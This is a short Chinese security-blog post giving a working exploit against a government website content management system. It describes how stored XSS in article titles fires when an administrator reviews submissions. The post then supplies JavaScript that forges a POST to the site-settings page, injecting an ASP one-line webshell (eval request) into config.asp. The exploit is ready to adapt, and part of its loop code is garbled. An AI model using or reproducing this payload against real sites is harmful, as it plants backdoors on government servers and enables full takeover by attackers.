广州网域高科政府网站管理系统csrf getshell

漏洞分析
前台发表文章处未过滤xss标签,管理员后台http://0day5.com/CheckNews1.asp时对标题未过滤,可以xss攻击,结合系统配置处的config.asp 插马,可以 csrf getshell。
攻击流程,如图
1
exploit:
[php]
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
getshell();
function getshell(){
var postUrl="/wygk_cn_SystemSave.asp";
var postdata= "SiteName=1&xpurl=http%3A%2F%2F127.0.0.1%2F&email=1&QQ=1&Copyright=1&Address=1&Zip=1&Tel=1&SiteDescription=1&SiteKeywords=1&B_BG=3&logo=1&logourl=1&gd1=0&TopBanner=1&TopBannerurl=1&OtherTopBanner=1&OtherTopBannerurl=1&gd2=0&moveurl=&UpFileType=doc%7Cppt%7Cxls%7Crar%7Czip%7Cmdb%7Cmp3%7Cpdf%7Cgsp%7CDWF%7Ctxt%7Cyaseng%7Cphp%7Casp%22%25%3E%3C%25eval+request%28%22c%22%29%25%3E&MaxFileSize=102400&byteType=1&byteipType=&bytezfType=&newsipType=&wygk_cn_dbmenu=1&BOTTOMmenu=1&R_BG=0&AD_Show=0&ad_class=0&R_TOP=1&L_MAIN=1&R_MAIN=1&WYGK_CN_announceview=0&gg1=1&L_BG=2&index_top_news=6&top_news=10&bigclassshownum=10&sp_class=1&top_sp=6&top_pic_sp=3&index_top_txt=6&top_txt=10&top_img=5&reviewnum=6&picnum=10&newsnum=10&topuser=4&linkshownum=10&Submit=%CC%E1%BD%BB";
xmlhttp.open("POST", postUrl, true);//url需要自己修改
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", postdata.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(postdata);
} [/php]

1 条评论

  1. Mantra

    :lol:

发表评论